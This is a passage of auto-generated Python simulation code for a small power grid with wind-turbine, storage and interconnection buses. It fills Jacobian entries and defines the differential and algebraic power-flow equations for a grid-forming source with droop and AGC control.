        struct[0].Gy_ini[12,15] = V_POImv*V_W3mv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) + g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
        struct[0].Gy_ini[13,4] = V_W3mv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
        struct[0].Gy_ini[13,5] = V_W3lv*V_W3mv*(-b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
        struct[0].Gy_ini[13,10] = V_W3mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
        struct[0].Gy_ini[13,11] = V_W2mv*V_W3mv*(-b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
        struct[0].Gy_ini[13,12] = V_POImv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) + g_W3mv_POImv*sin(theta_POImv - theta_W3mv)) + V_W2mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv)) + V_W3lv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv)) + 2*V_W3mv*(-b_W2mv_W3mv - b_W3mv_POImv - b_W3mv_W3lv - bs_W2mv_W3mv/2 - bs_W3mv_POImv/2 - bs_W3mv_W3lv/2)
        struct[0].Gy_ini[13,13] = V_POImv*V_W3mv*(b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv)) + V_W2mv*V_W3mv*(b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv)) + V_W3lv*V_W3mv*(b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
        struct[0].Gy_ini[13,14] = V_W3mv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) + g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
        struct[0].Gy_ini[13,15] = V_POImv*V_W3mv*(-b_W3mv_POImv*sin(theta_POImv - theta_W3mv) + g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
        struct[0].Gy_ini[14,12] = V_POImv*(-b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
        struct[0].Gy_ini[14,13] = V_POImv*V_W3mv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) - g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
        struct[0].Gy_ini[14,14] = V_POI*(b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv)) + 2*V_POImv*(g_POI_POImv + g_STmv_POImv + g_W3mv_POImv) + V_STmv*(-b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv)) + V_W3mv*(-b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
        struct[0].Gy_ini[14,15] = V_POI*V_POImv*(-b_POI_POImv*cos(theta_POI - theta_POImv) - g_POI_POImv*sin(theta_POI - theta_POImv)) + V_POImv*V_STmv*(-b_STmv_POImv*cos(theta_POImv - theta_STmv) + g_STmv_POImv*sin(theta_POImv - theta_STmv)) + V_POImv*V_W3mv*(-b_W3mv_POImv*cos(theta_POImv - theta_W3mv) + g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
        struct[0].Gy_ini[14,16] = V_POImv*(-b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv))
        struct[0].Gy_ini[14,17] = V_POImv*V_STmv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) - g_STmv_POImv*sin(theta_POImv - theta_STmv))
        struct[0].Gy_ini[14,18] = V_POImv*(b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv))
        struct[0].Gy_ini[14,19] = V_POI*V_POImv*(b_POI_POImv*cos(theta_POI - theta_POImv) + g_POI_POImv*sin(theta_POI - theta_POImv))
        struct[0].Gy_ini[15,12] = V_POImv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) - g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
        struct[0].Gy_ini[15,13] = V_POImv*V_W3mv*(b_W3mv_POImv*sin(theta_POImv - theta_W3mv) + g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
        struct[0].Gy_ini[15,14] = V_POI*(b_POI_POImv*cos(theta_POI - theta_POImv) + g_POI_POImv*sin(theta_POI - theta_POImv)) + 2*V_POImv*(-b_POI_POImv - b_STmv_POImv - b_W3mv_POImv - bs_POI_POImv/2 - bs_STmv_POImv/2 - bs_W3mv_POImv/2) + V_STmv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) - g_STmv_POImv*sin(theta_POImv - theta_STmv)) + V_W3mv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) - g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
        struct[0].Gy_ini[15,15] = V_POI*V_POImv*(b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv)) + V_POImv*V_STmv*(-b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv)) + V_POImv*V_W3mv*(-b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
        struct[0].Gy_ini[15,16] = V_POImv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) - g_STmv_POImv*sin(theta_POImv - theta_STmv))
        struct[0].Gy_ini[15,17] = V_POImv*V_STmv*(b_STmv_POImv*sin(theta_POImv - theta_STmv) + g_STmv_POImv*cos(theta_POImv - theta_STmv))
        struct[0].Gy_ini[15,18] = V_POImv*(b_POI_POImv*cos(theta_POI - theta_POImv) + g_POI_POImv*sin(theta_POI - theta_POImv))
        struct[0].Gy_ini[15,19] = V_POI*V_POImv*(-b_POI_POImv*sin(theta_POI - theta_POImv) + g_POI_POImv*cos(theta_POI - theta_POImv))
        struct[0].Gy_ini[16,6] = V_STmv*(b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv))
        struct[0].Gy_ini[16,7] = V_STlv*V_STmv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) + g_STmv_STlv*sin(theta_STlv - theta_STmv))
        struct[0].Gy_ini[16,14] = V_STmv*(b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv))
        struct[0].Gy_ini[16,15] = V_POImv*V_STmv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) + g_STmv_POImv*sin(theta_POImv - theta_STmv))
        struct[0].Gy_ini[16,16] = V_POImv*(b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv)) + V_STlv*(b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv)) + 2*V_STmv*(g_STmv_POImv + g_STmv_STlv)
        struct[0].Gy_ini[16,17] = V_POImv*V_STmv*(-b_STmv_POImv*cos(theta_POImv - theta_STmv) - g_STmv_POImv*sin(theta_POImv - theta_STmv)) + V_STlv*V_STmv*(-b_STmv_STlv*cos(theta_STlv - theta_STmv) - g_STmv_STlv*sin(theta_STlv - theta_STmv))
        struct[0].Gy_ini[17,6] = V_STmv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) + g_STmv_STlv*sin(theta_STlv - theta_STmv))
        struct[0].Gy_ini[17,7] = V_STlv*V_STmv*(-b_STmv_STlv*sin(theta_STlv - theta_STmv) + g_STmv_STlv*cos(theta_STlv - theta_STmv))
        struct[0].Gy_ini[17,14] = V_STmv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) + g_STmv_POImv*sin(theta_POImv - theta_STmv))
        struct[0].Gy_ini[17,15] = V_POImv*V_STmv*(-b_STmv_POImv*sin(theta_POImv - theta_STmv) + g_STmv_POImv*cos(theta_POImv - theta_STmv))
        struct[0].Gy_ini[17,16] = V_POImv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) + g_STmv_POImv*sin(theta_POImv - theta_STmv)) + V_STlv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) + g_STmv_STlv*sin(theta_STlv - theta_STmv)) + 2*V_STmv*(-b_STmv_POImv - b_STmv_STlv - bs_STmv_POImv/2 - bs_STmv_STlv/2)
        struct[0].Gy_ini[17,17] = V_POImv*V_STmv*(b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv)) + V_STlv*V_STmv*(b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv))
        struct[0].Gy_ini[18,14] = V_POI*(-b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv))
        struct[0].Gy_ini[18,15] = V_POI*V_POImv*(b_POI_POImv*cos(theta_POI - theta_POImv) - g_POI_POImv*sin(theta_POI - theta_POImv))
        struct[0].Gy_ini[18,18] = V_GRID*(b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI)) + 2*V_POI*(g_POI_GRID + g_POI_POImv) + V_POImv*(-b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv))
        struct[0].Gy_ini[18,19] = V_GRID*V_POI*(-b_POI_GRID*cos(theta_GRID - theta_POI) - g_POI_GRID*sin(theta_GRID - theta_POI)) + V_POI*V_POImv*(-b_POI_POImv*cos(theta_POI - theta_POImv) + g_POI_POImv*sin(theta_POI - theta_POImv))
        struct[0].Gy_ini[18,20] = V_POI*(b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI))
        struct[0].Gy_ini[18,21] = V_GRID*V_POI*(b_POI_GRID*cos(theta_GRID - theta_POI) + g_POI_GRID*sin(theta_GRID - theta_POI))
        struct[0].Gy_ini[19,14] = V_POI*(b_POI_POImv*cos(theta_POI - theta_POImv) - g_POI_POImv*sin(theta_POI - theta_POImv))
        struct[0].Gy_ini[19,15] = V_POI*V_POImv*(b_POI_POImv*sin(theta_POI - theta_POImv) + g_POI_POImv*cos(theta_POI - theta_POImv))
        struct[0].Gy_ini[19,18] = V_GRID*(b_POI_GRID*cos(theta_GRID - theta_POI) + g_POI_GRID*sin(theta_GRID - theta_POI)) + 2*V_POI*(-b_POI_GRID - b_POI_POImv - bs_POI_GRID/2 - bs_POI_POImv/2) + V_POImv*(b_POI_POImv*cos(theta_POI - theta_POImv) - g_POI_POImv*sin(theta_POI - theta_POImv))
        struct[0].Gy_ini[19,19] = V_GRID*V_POI*(b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI)) + V_POI*V_POImv*(-b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv))
        struct[0].Gy_ini[19,20] = V_POI*(b_POI_GRID*cos(theta_GRID - theta_POI) + g_POI_GRID*sin(theta_GRID - theta_POI))
        struct[0].Gy_ini[19,21] = V_GRID*V_POI*(-b_POI_GRID*sin(theta_GRID - theta_POI) + g_POI_GRID*cos(theta_GRID - theta_POI))
        struct[0].Gy_ini[20,18] = V_GRID*(-b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI))
        struct[0].Gy_ini[20,19] = V_GRID*V_POI*(b_POI_GRID*cos(theta_GRID - theta_POI) - g_POI_GRID*sin(theta_GRID - theta_POI))
        struct[0].Gy_ini[20,20] = 2*V_GRID*g_POI_GRID + V_POI*(-b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI))
        struct[0].Gy_ini[20,21] = V_GRID*V_POI*(-b_POI_GRID*cos(theta_GRID - theta_POI) + g_POI_GRID*sin(theta_GRID - theta_POI))
        struct[0].Gy_ini[20,25] = -S_n_GRID/S_base
        struct[0].Gy_ini[21,18] = V_GRID*(b_POI_GRID*cos(theta_GRID - theta_POI) - g_POI_GRID*sin(theta_GRID - theta_POI))
        struct[0].Gy_ini[21,19] = V_GRID*V_POI*(b_POI_GRID*sin(theta_GRID - theta_POI) + g_POI_GRID*cos(theta_GRID - theta_POI))
        struct[0].Gy_ini[21,20] = 2*V_GRID*(-b_POI_GRID - bs_POI_GRID/2) + V_POI*(b_POI_GRID*cos(theta_GRID - theta_POI) - g_POI_GRID*sin(theta_GRID - theta_POI))
        struct[0].Gy_ini[21,21] = V_GRID*V_POI*(-b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI))
        struct[0].Gy_ini[21,26] = -S_n_GRID/S_base
        struct[0].Gy_ini[22,20] = K_p_GRID*(-i_d_GRID*sin(delta_GRID - theta_GRID) - i_q_GRID*cos(delta_GRID - theta_GRID))
        struct[0].Gy_ini[22,21] = K_p_GRID*(V_GRID*i_d_GRID*cos(delta_GRID - theta_GRID) - V_GRID*i_q_GRID*sin(delta_GRID - theta_GRID))
        struct[0].Gy_ini[22,23] = K_p_GRID*(-2*R_v_GRID*i_d_GRID - V_GRID*sin(delta_GRID - theta_GRID))
        struct[0].Gy_ini[22,24] = K_p_GRID*(-2*R_v_GRID*i_q_GRID - V_GRID*cos(delta_GRID - theta_GRID))
        struct[0].Gy_ini[22,27] = K_p_GRID
        struct[0].Gy_ini[23,20] = -sin(delta_GRID - theta_GRID)
        struct[0].Gy_ini[23,21] = V_GRID*cos(delta_GRID - theta_GRID)
        struct[0].Gy_ini[23,23] = -R_v_GRID
        struct[0].Gy_ini[23,24] = X_v_GRID
        struct[0].Gy_ini[24,20] = -cos(delta_GRID - theta_GRID)
        struct[0].Gy_ini[24,21] = -V_GRID*sin(delta_GRID - theta_GRID)
        struct[0].Gy_ini[24,23] = -X_v_GRID
        struct[0].Gy_ini[24,24] = -R_v_GRID
        struct[0].Gy_ini[25,20] = i_d_GRID*sin(delta_GRID - theta_GRID) + i_q_GRID*cos(delta_GRID - theta_GRID)
        struct[0].Gy_ini[25,21] = -V_GRID*i_d_GRID*cos(delta_GRID - theta_GRID) + V_GRID*i_q_GRID*sin(delta_GRID - theta_GRID)
        struct[0].Gy_ini[25,23] = V_GRID*sin(delta_GRID - theta_GRID)
        struct[0].Gy_ini[25,24] = V_GRID*cos(delta_GRID - theta_GRID)
        struct[0].Gy_ini[26,20] = i_d_GRID*cos(delta_GRID - theta_GRID) - i_q_GRID*sin(delta_GRID - theta_GRID)
        struct[0].Gy_ini[26,21] = V_GRID*i_d_GRID*sin(delta_GRID - theta_GRID) + V_GRID*i_q_GRID*cos(delta_GRID - theta_GRID)
        struct[0].Gy_ini[26,23] = V_GRID*cos(delta_GRID - theta_GRID)
        struct[0].Gy_ini[26,24] = -V_GRID*sin(delta_GRID - theta_GRID)
        struct[0].Gy_ini[27,22] = -1/Droop_GRID
        struct[0].Gy_ini[27,29] = K_sec_GRID
        struct[0].Gy_ini[29,28] = -K_p_agc
@numba.njit(cache=True)
def run(t,struct,mode):
# Parameters:
S_base = struct[0].S_base
g_W1mv_W2mv = struct[0].g_W1mv_W2mv
b_W1mv_W2mv = struct[0].b_W1mv_W2mv
bs_W1mv_W2mv = struct[0].bs_W1mv_W2mv
g_W2mv_W3mv = struct[0].g_W2mv_W3mv
b_W2mv_W3mv = struct[0].b_W2mv_W3mv
bs_W2mv_W3mv = struct[0].bs_W2mv_W3mv
g_W3mv_POImv = struct[0].g_W3mv_POImv
b_W3mv_POImv = struct[0].b_W3mv_POImv
bs_W3mv_POImv = struct[0].bs_W3mv_POImv
g_STmv_POImv = struct[0].g_STmv_POImv
b_STmv_POImv = struct[0].b_STmv_POImv
bs_STmv_POImv = struct[0].bs_STmv_POImv
g_POI_GRID = struct[0].g_POI_GRID
b_POI_GRID = struct[0].b_POI_GRID
bs_POI_GRID = struct[0].bs_POI_GRID
g_POI_POImv = struct[0].g_POI_POImv
b_POI_POImv = struct[0].b_POI_POImv
bs_POI_POImv = struct[0].bs_POI_POImv
g_W1mv_W1lv = struct[0].g_W1mv_W1lv
b_W1mv_W1lv = struct[0].b_W1mv_W1lv
bs_W1mv_W1lv = struct[0].bs_W1mv_W1lv
g_W2mv_W2lv = struct[0].g_W2mv_W2lv
b_W2mv_W2lv = struct[0].b_W2mv_W2lv
bs_W2mv_W2lv = struct[0].bs_W2mv_W2lv
g_W3mv_W3lv = struct[0].g_W3mv_W3lv
b_W3mv_W3lv = struct[0].b_W3mv_W3lv
bs_W3mv_W3lv = struct[0].bs_W3mv_W3lv
g_STmv_STlv = struct[0].g_STmv_STlv
b_STmv_STlv = struct[0].b_STmv_STlv
bs_STmv_STlv = struct[0].bs_STmv_STlv
U_W1lv_n = struct[0].U_W1lv_n
U_W2lv_n = struct[0].U_W2lv_n
U_W3lv_n = struct[0].U_W3lv_n
U_STlv_n = struct[0].U_STlv_n
U_W1mv_n = struct[0].U_W1mv_n
U_W2mv_n = struct[0].U_W2mv_n
U_W3mv_n = struct[0].U_W3mv_n
U_POImv_n = struct[0].U_POImv_n
U_STmv_n = struct[0].U_STmv_n
U_POI_n = struct[0].U_POI_n
U_GRID_n = struct[0].U_GRID_n
S_n_GRID = struct[0].S_n_GRID
Omega_b_GRID = struct[0].Omega_b_GRID
K_p_GRID = struct[0].K_p_GRID
T_p_GRID = struct[0].T_p_GRID
K_q_GRID = struct[0].K_q_GRID
T_v_GRID = struct[0].T_v_GRID
X_v_GRID = struct[0].X_v_GRID
R_v_GRID = struct[0].R_v_GRID
K_delta_GRID = struct[0].K_delta_GRID
K_sec_GRID = struct[0].K_sec_GRID
Droop_GRID = struct[0].Droop_GRID
K_p_agc = struct[0].K_p_agc
K_i_agc = struct[0].K_i_agc
# Inputs:
P_W1lv = struct[0].P_W1lv
Q_W1lv = struct[0].Q_W1lv
P_W2lv = struct[0].P_W2lv
Q_W2lv = struct[0].Q_W2lv
P_W3lv = struct[0].P_W3lv
Q_W3lv = struct[0].Q_W3lv
P_STlv = struct[0].P_STlv
Q_STlv = struct[0].Q_STlv
P_W1mv = struct[0].P_W1mv
Q_W1mv = struct[0].Q_W1mv
P_W2mv = struct[0].P_W2mv
Q_W2mv = struct[0].Q_W2mv
P_W3mv = struct[0].P_W3mv
Q_W3mv = struct[0].Q_W3mv
P_POImv = struct[0].P_POImv
Q_POImv = struct[0].Q_POImv
P_STmv = struct[0].P_STmv
Q_STmv = struct[0].Q_STmv
P_POI = struct[0].P_POI
Q_POI = struct[0].Q_POI
P_GRID = struct[0].P_GRID
Q_GRID = struct[0].Q_GRID
v_ref_GRID = struct[0].v_ref_GRID
p_m_GRID = struct[0].p_m_GRID
p_c_GRID = struct[0].p_c_GRID
omega_ref_GRID = struct[0].omega_ref_GRID
q_ref_GRID = struct[0].q_ref_GRID
# Dynamical states:
delta_GRID = struct[0].x[0,0]
xi_p_GRID = struct[0].x[1,0]
e_qv_GRID = struct[0].x[2,0]
xi_freq = struct[0].x[3,0]
# Algebraic states:
V_W1lv = struct[0].y_run[0,0]
theta_W1lv = struct[0].y_run[1,0]
V_W2lv = struct[0].y_run[2,0]
theta_W2lv = struct[0].y_run[3,0]
V_W3lv = struct[0].y_run[4,0]
theta_W3lv = struct[0].y_run[5,0]
V_STlv = struct[0].y_run[6,0]
theta_STlv = struct[0].y_run[7,0]
V_W1mv = struct[0].y_run[8,0]
theta_W1mv = struct[0].y_run[9,0]
V_W2mv = struct[0].y_run[10,0]
theta_W2mv = struct[0].y_run[11,0]
V_W3mv = struct[0].y_run[12,0]
theta_W3mv = struct[0].y_run[13,0]
V_POImv = struct[0].y_run[14,0]
theta_POImv = struct[0].y_run[15,0]
V_STmv = struct[0].y_run[16,0]
theta_STmv = struct[0].y_run[17,0]
V_POI = struct[0].y_run[18,0]
theta_POI = struct[0].y_run[19,0]
V_GRID = struct[0].y_run[20,0]
theta_GRID = struct[0].y_run[21,0]
omega_GRID = struct[0].y_run[22,0]
i_d_GRID = struct[0].y_run[23,0]
i_q_GRID = struct[0].y_run[24,0]
p_g_GRID = struct[0].y_run[25,0]
q_g_GRID = struct[0].y_run[26,0]
p_m_GRID = struct[0].y_run[27,0]
omega_coi = struct[0].y_run[28,0]
p_agc = struct[0].y_run[29,0]
struct[0].u_run[0,0] = P_W1lv
struct[0].u_run[1,0] = Q_W1lv
struct[0].u_run[2,0] = P_W2lv
struct[0].u_run[3,0] = Q_W2lv
struct[0].u_run[4,0] = P_W3lv
struct[0].u_run[5,0] = Q_W3lv
struct[0].u_run[6,0] = P_STlv
struct[0].u_run[7,0] = Q_STlv
struct[0].u_run[8,0] = P_W1mv
struct[0].u_run[9,0] = Q_W1mv
struct[0].u_run[10,0] = P_W2mv
struct[0].u_run[11,0] = Q_W2mv
struct[0].u_run[12,0] = P_W3mv
struct[0].u_run[13,0] = Q_W3mv
struct[0].u_run[14,0] = P_POImv
struct[0].u_run[15,0] = Q_POImv
struct[0].u_run[16,0] = P_STmv
struct[0].u_run[17,0] = Q_STmv
struct[0].u_run[18,0] = P_POI
struct[0].u_run[19,0] = Q_POI
struct[0].u_run[20,0] = P_GRID
struct[0].u_run[21,0] = Q_GRID
struct[0].u_run[22,0] = v_ref_GRID
struct[0].u_run[23,0] = p_m_GRID
struct[0].u_run[24,0] = p_c_GRID
struct[0].u_run[25,0] = omega_ref_GRID
struct[0].u_run[26,0] = q_ref_GRID
# Differential equations:
if mode == 2:
struct[0].f[0,0] = -K_delta_GRID*delta_GRID + Omega_b_GRID*(omega_GRID - omega_coi)
struct[0].f[1,0] = -i_d_GRID*(R_v_GRID*i_d_GRID + V_GRID*sin(delta_GRID - theta_GRID)) - i_q_GRID*(R_v_GRID*i_q_GRID + V_GRID*cos(delta_GRID - theta_GRID)) + p_m_GRID
struct[0].f[2,0] = (K_q_GRID*(-q_g_GRID + q_ref_GRID) - e_qv_GRID + v_ref_GRID)/T_v_GRID
struct[0].f[3,0] = 1 - omega_coi
# Algebraic equations:
if mode == 3:
struct[0].g[:,:] = np.ascontiguousarray(struct[0].Gy) @ np.ascontiguousarray(struct[0].y_run) + np.ascontiguousarray(struct[0].Gu) @ np.ascontiguousarray(struct[0].u_run)
struct[0].g[0,0] = -P_W1lv/S_base + V_W1lv**2*g_W1mv_W1lv + V_W1lv*V_W1mv*(-b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
struct[0].g[1,0] = -Q_W1lv/S_base + V_W1lv**2*(-b_W1mv_W1lv - bs_W1mv_W1lv/2) + V_W1lv*V_W1mv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
struct[0].g[2,0] = -P_W2lv/S_base + V_W2lv**2*g_W2mv_W2lv + V_W2lv*V_W2mv*(-b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
struct[0].g[3,0] = -Q_W2lv/S_base + V_W2lv**2*(-b_W2mv_W2lv - bs_W2mv_W2lv/2) + V_W2lv*V_W2mv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
struct[0].g[4,0] = -P_W3lv/S_base + V_W3lv**2*g_W3mv_W3lv + V_W3lv*V_W3mv*(-b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].g[5,0] = -Q_W3lv/S_base + V_W3lv**2*(-b_W3mv_W3lv - bs_W3mv_W3lv/2) + V_W3lv*V_W3mv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].g[6,0] = -P_STlv/S_base + V_STlv**2*g_STmv_STlv + V_STlv*V_STmv*(-b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].g[7,0] = -Q_STlv/S_base + V_STlv**2*(-b_STmv_STlv - bs_STmv_STlv/2) + V_STlv*V_STmv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) - g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].g[8,0] = -P_W1mv/S_base + V_W1lv*V_W1mv*(b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv)) + V_W1mv**2*(g_W1mv_W1lv + g_W1mv_W2mv) + V_W1mv*V_W2mv*(-b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
struct[0].g[9,0] = -Q_W1mv/S_base + V_W1lv*V_W1mv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv)) + V_W1mv**2*(-b_W1mv_W1lv - b_W1mv_W2mv - bs_W1mv_W1lv/2 - bs_W1mv_W2mv/2) + V_W1mv*V_W2mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
struct[0].g[10,0] = -P_W2mv/S_base + V_W1mv*V_W2mv*(b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv)) + V_W2lv*V_W2mv*(b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv)) + V_W2mv**2*(g_W1mv_W2mv + g_W2mv_W2lv + g_W2mv_W3mv) + V_W2mv*V_W3mv*(-b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
struct[0].g[11,0] = -Q_W2mv/S_base + V_W1mv*V_W2mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv)) + V_W2lv*V_W2mv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv)) + V_W2mv**2*(-b_W1mv_W2mv - b_W2mv_W2lv - b_W2mv_W3mv - bs_W1mv_W2mv/2 - bs_W2mv_W2lv/2 - bs_W2mv_W3mv/2) + V_W2mv*V_W3mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
struct[0].g[12,0] = -P_W3mv/S_base + V_POImv*V_W3mv*(b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv)) + V_W2mv*V_W3mv*(b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv)) + V_W3lv*V_W3mv*(b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv)) + V_W3mv**2*(g_W2mv_W3mv + g_W3mv_POImv + g_W3mv_W3lv)
struct[0].g[13,0] = -Q_W3mv/S_base + V_POImv*V_W3mv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) + g_W3mv_POImv*sin(theta_POImv - theta_W3mv)) + V_W2mv*V_W3mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv)) + V_W3lv*V_W3mv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv)) + V_W3mv**2*(-b_W2mv_W3mv - b_W3mv_POImv - b_W3mv_W3lv - bs_W2mv_W3mv/2 - bs_W3mv_POImv/2 - bs_W3mv_W3lv/2)
struct[0].g[14,0] = -P_POImv/S_base + V_POI*V_POImv*(b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv)) + V_POImv**2*(g_POI_POImv + g_STmv_POImv + g_W3mv_POImv) + V_POImv*V_STmv*(-b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv)) + V_POImv*V_W3mv*(-b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
struct[0].g[15,0] = -Q_POImv/S_base + V_POI*V_POImv*(b_POI_POImv*cos(theta_POI - theta_POImv) + g_POI_POImv*sin(theta_POI - theta_POImv)) + V_POImv**2*(-b_POI_POImv - b_STmv_POImv - b_W3mv_POImv - bs_POI_POImv/2 - bs_STmv_POImv/2 - bs_W3mv_POImv/2) + V_POImv*V_STmv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) - g_STmv_POImv*sin(theta_POImv - theta_STmv)) + V_POImv*V_W3mv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) - g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
